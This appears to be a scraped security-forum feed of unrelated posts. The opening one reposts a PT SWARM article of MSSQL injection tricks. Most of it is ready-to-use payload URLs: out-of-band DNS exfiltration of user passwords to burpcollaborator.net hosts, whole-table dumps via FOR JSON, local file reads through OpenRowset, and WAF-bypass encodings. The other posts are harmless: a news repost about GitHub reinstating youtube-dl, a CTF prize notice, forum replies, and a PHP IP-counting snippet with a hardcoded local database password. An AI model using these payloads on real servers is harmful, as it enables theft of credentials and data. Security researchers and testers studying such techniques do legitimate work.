Leaderboard

Advanced MSSQL Injection Tricks Written by PT SWARM Team on November 12, 2020 PT SWARM Team ptswarm We compiled a list of several techniques for improved exploition of MSSQL injections. All the vectors have been tested on at least three of the latest versions of Microsoft SQL Server: 2019, 2017, 2016SP2. DNS Out-of-Band If confronted with a fully blind SQL injection with disabled stacked queries, it’s possible to attain DNS out-of-band (OOB) data exfiltration via the functions fn_xe_file_target_read_file, fn_get_audit_file, and fn_trace_gettable. fn_xe_file_target_read_file() example: https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null)) Permissions: Requires VIEW SERVER STATE permission on the server. fn_get_audit_file() example: https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default))) Permissions: Requires the CONTROL SERVER permission. fn_trace_gettable() example: https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default)) Permissions: Requires the CONTROL SERVER permission. Alternative Error-Based vectors Error-based SQL injections typically resemble constructions such as «+AND+1=@@version–» and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data. Some examples of such functions: SUSER_NAME() USER_NAME() PERMISSIONS() DB_NAME() FILE_NAME() TYPE_NAME() COL_NAME() Example use of function USER_NAME(): https://vuln.app/getItem?id=1'%2buser_name(@@version)-- Quick exploitation: Retrieve an entire table in one query There exist two simple ways to retrieve the entire contents of a table in one query — the use of the FOR XML or the FOR JSON clause. The FOR XML clause requires a specified mode such as «raw», so in terms of brevity FOR JSON outperforms it. The query to retrieve the schema, tables and columns from the current database: https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto-- Error-based vectors need an alias or a name, since the output of expressions without either cannot be formatted as JSON. https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)-- Reading local files An example of retrieving a local file C:\Windows\win.ini using the function OpenRowset(): https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:\Windows\win.ini’,SINGLE_CLOB)+R(x)),null,null Error-based vector: https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))-- Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission. Retrieving the current query The current SQL query being executed can be retrieved from access sys.dm_exec_requests and sys.dm_exec_sql_text: https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null Permissions: If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session. Little tricks for WAF bypasses Non-standard whitespace characters: %C2%85 или %C2%A0: https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null-- Scientific (0e) and hex (0x) notation for obfuscating UNION: https://vuln.app/getItem?id=0eunion+select+null,@@version,null-- https://vuln.app/getItem?id=0xunion+select+null,@@version,null-- A period instead of a whitespace between FROM and a column name: https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users-- \N seperator between SELECT and a throwaway column: https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users-- Sursa: https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/

GitHub Reinstates Youtube-DL and Puts $1M in Takedown Defense Fund November 16, 2020 by Ernesto Van der Sar GitHub has reinstated the youtube-dl repository after it concluded that the code doesn't violate the DMCA's anti-circumvention provisions. The company believes that developers should have the freedom to tinker, whether the RIAA likes it or not, and has placed $1 million into a takedown defense fund. Last month, the RIAA pulled the popular open source tool youtube-mp3 from GitHub. The music group sent a takedown notice arguing that the software violated section 1201 of the DMCA, which prevents people from bypassing technical protection measures. This enforcement action wasn’t well-received by the developer community. This included GitHub CEO Nat Friedman, who was ‘annoyed’ and personally offered his help to get the repository reinstated. This wasn’t a false promise, as youtube-dl returned today. GitHub Reinstates Youtube-dl “We are taking a stand for developers and have reinstated the youtube-dl repo. Section 1201 of the DMCA is broken and needs to be fixed. Developers should have the freedom to tinker. That’s how you get great tools like youtube-dl,” Friedman says. GitHub has reinstated the repository after some changes were made. These changes include referrals to copyrighted music, which RIAA pointed out in its claim. However, the software still allows people to download files, including music tracks, from YouTube. After a careful look at the “circumvention” allegations, GitHub now concludes that they are not valid. The company explains that it “received additional information” that allowed it “to reverse” the takedown. No DMCA Anti-Circumvention Violations “[O]ur reinstatement, based on new information that showed the project was not circumventing a technical protection measure (TPM), was inline with our values of putting developers first,” GitHub notes. This new information comes from the Electronic Frontier Foundation (EFF), which responded to the RIAA’s takedown request on behalf of the youtube-dl developers. The EFF’s letter explains in detail how the software works and stresses that there is no advanced decryption involved, as we highlighted earlier. “Youtube-dl stands in place of a Web browser and performs a similar function with respect to user-uploaded videos. Importantly, youtube-dl does not decrypt video streams that are encrypted with commercial DRM technologies, such as Widevine, that are used by subscription video sites, such as Netflix,” the letter reads. The letter helped to convince GitHub that it wrongly granted the takedown request. And since other copyright issues pointed out by the RIAA were addressed as well, the company decided to reinstate the repository. Developers First In addition, the revolt from the developer community was a clear reminder that developers should come first. As such, GitHub also announced that it will overhaul the way it handles DMCA section 1201 claims. One key change is that content won’t always be removed right away. This change doesn’t apply to regular DMCA takedown notices but to ‘circumvention’ claims specifically. From now on, these will all be manually reviewed and scrutinized by experts. “When we see it is possible to modify a project to remove allegedly infringing content, we give the owners a chance to fix problems before we take content down. If not, they can always respond to the notification disabling the repository and offer to make changes, or file a counter notice,” GitHub explains. $1M in Defense Fund The developer platform will aid developers financially as well. The company announced that it will put $1 million into a defense fund to help open source developers on GitHub protect themselves from overbroad or unwarranted DMCA Section 1201 takedown requests. In addition, it will also get more involved in the political side of things. Every three years the US Copyright Office reviews its DMCA anti-circumvention exceptions and GitHub will have its voice heard there as well. “We are also advocating specifically on the anti-circumvention provisions of the DMCA to promote developers’ freedom to build socially beneficial tools like youtube-dl,” the company notes. All in all, it’s safe to say that the RIAA’s takedown attempt has completely backfired. We previously reached out to the music group for comment on related youtube-dl issues, but this request remains unanswered. The RIAA continues to issue similar DMCA circumvention requests to other companies, including Google. These argue that YouTube rippers violate the DMCA as they bypass YouTube’s “rolling cipher.” At GitHub, those won’t work anymore. Youtube-dl Devs Are Happy Sergey, one of the youtube-dl developers, tells us that he is happy with all the support they have received from the EFF, GitHub, as well as the public at large. “EFF’s help was invaluable. We’d like to thank EFF and Mitch Stoltz personally for their incredible support and dedication. We’d also like to thank GitHub for standing up for youtube-dl and taking potential legal risks by allowing youtube-dl to keep the rolling cipher code,” he says. “We’re also grateful to all the tremendous amount of support and offers received lately (we physically were not able to respond to everyone) and all youtube-dl users,” Sergey adds. Sursa: https://torrentfreak.com/github-reinstates-youtube-dl-and-puts-1m-in-takedown-defense-fund-201116/?fbclid=IwAR0a6KNjcUtqxmGcq3wby9rV9sxoDHnwgSB83P17UhQ2fOgrPT1mFXVabnI

20 noiembrie 2020 10:00 - 18:00 Premiile pentru concurs: Locul I - 3000 RON Locul II - 2000 RON Locul III - 1000 RON Cel mai bun write-up - 500 RON Premiile sunt oferite din donații de la membrii comunității: Nytro, malsploit, Dragos, dancezar, Matasareanu. Trecem printr-o perioadă grea și sugestia noastră este ca premiile să fie donate, dacă acest lucru este posibil. Pentru discuții referitoare la CTF vom folosi canalul #ctf de pe Slack. Prezentarea rezultatelor concursului va avea loc la ora 18:00. Detalii complete: https://ctf.rstcon.com/

De la bun inceput, takedown-ul a fost aiurea, cineva de la RIAA s-a plictisit de Among Us in carantina si a zis sa faca si el ceva cu viata lui in ziua respectiva. E interesant faptul ca EFF le-a luat apararea si ca GitHub s-a decis sa-si aloce in buget 1M$ pentru situatii de genul pe viitor.

Sunt multe modalitati de a optimiza codul pe care l-am pus. Scriptul e scris in graba si testat doar pe un batch mic de elemente.

Recomand. Lucreaza rapid si eficient.

Daca vrei sa mergi in continuare pe structura pe care o ai in prezent, poti folosi regex sa-ti extragi datele si dupa sa lucrezi cu ele, spre exemplu <?php $mysql = mysqli_connect("localhost","ips","8hLXKFoFBuLld9LW","tests") or die("connection failure"); $q = $mysql->query("select val from ips"); $ips = array(); while($v = $q->fetch_row()) { preg_match('/((?:[0-9]{1,3}\.){3}[0-9]{1,3}) ([0-2]?[0-9]:[0-5]?[0-9]:[0-5]?[0-9]) ([0-2]?[0-9]\/[0-5]?[0-9]\/[0-9][0-9][0-9][0-9])/', $v[0], $matches); // scoatem prin regex IP-ul, ora si data din randul de mysql // echo $matches[1]; // IP // echo $matches[2]; // Ora // echo $matches[3]; // Data $ips[] = $matches[1]; // pusham IP-ul din randul de mysql in array-ul de IPs } print_r(array_count_values($ips)); // afisam de cate ori apare fiecare IP Cu valorile urmatoare in baza de date 127.0.0.1 13:29:05 13/08/2020 123.123.123.123 13:29:05 13/08/2020 127.0.0.1 13:29:05 13/08/2020 scriptul returneaza Array ( [127.0.0.1] => 2 [123.123.123.123] => 1 )

Cauta pe net "php mysql select" si ruleaza query-ul: SELECT ip, COUNT(*) AS cnt FROM table_name GROUP BY ip si vei avea lista unica de ipuri si numarul de repetitii pentru fiecare. EDIT: Acum am vazut ca ai zis ca ai toate informatiile in aceasi coloana. in loc de IP poti pune SUBSTRING_INDEX(nume_coloana, " ", 1) daca esti sigur ca ai intotdeauna IP si ca este pe pozitia 1 (pana in primul spatiu) si ca nu contine spatii (adica sa fie fix ca in exemplul tau).

Cred ca iti dai seama ca nu se risca nimeni sa-ti dea o invitatie cand ti-ai facut cont doar ca sa postezi aici.